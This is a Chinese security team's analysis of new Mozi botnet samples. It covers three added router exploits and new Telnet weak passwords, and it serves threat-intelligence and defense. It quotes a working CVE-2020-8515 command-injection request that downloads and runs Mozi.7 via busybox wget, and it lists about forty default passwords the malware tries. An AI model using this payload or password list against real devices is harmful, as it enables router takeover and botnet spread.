Mozi最新样本变化分析

启明星辰金睛安全研究团队 2020-10-19

1215

一. 概述

近日我们发现很多命名为i和bin.sh的Mozi样本，代码没有太大变化。但新加了3个漏洞利用，Telnet弱口令密码也有变化。

二. 漏洞利用

漏洞利用代码比之前的Mozi多了好几个，其中比较新的是CVE-2020-8515，POC是：

POST cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}Mozi.7;${IFS}busybox${IFS}wget${IFS}http://%s:%d/Mozi.7;${IFS}chmod${IFS}777${IFS}Mozi.7;${IFS}./Mozi.7'%0A%27&loginUser=a&loginPwd=aHTTP/1.0\r\n\r\n

新增的漏洞利用：

漏洞名称	受影响设备
CVE-2020-8515	DrayTek-Vigor企业级路由器交换机
DLinkDSL-2750B OS远程命令注入	D-Link DSL-2750B
Netlink GPON Router远程代码执行	Netlink GPON Router 1.0.11

三. upnp端口映射

四. Telnet弱口令

新增加的弱口令如下：

1234、12341234、12345678、20080826、123456789、1234567890、88888888、070admin、1q2w3e、a1sev5y7c39k、Admin、administrator、aquario、bayandsl、BrAhMoS@15、CenturyL1nk、chtngpon、chtsgpon、CTLSupport12、CUAdmin、DLKT20060205、friend、ftp、GeNeXiS@19、ho4uku6at、kopp、localadmin、nE7jA%5m、netscreen、operator、qwerty、r@p8p0r+、ruijie、samsung、sp-admin、super、support123、svgodie、telnet、test1、vertex25ektks123、vnpt、zyad1234

五. 简要总结

增加了最新漏洞利用和弱口令，这都显示攻击者一直在更新维护Mozi。尝试upnp端口映射，很可能想直接访问内网，值得持续关注。

数据库

文章转载自启明星辰金睛安全研究团队，如果涉嫌侵权，请发送邮件至：contact@modb.pro进行举报，并提供相关证据，一经查实，墨天轮将立刻删除相关内容。

Mozi最新样本变化分析

评论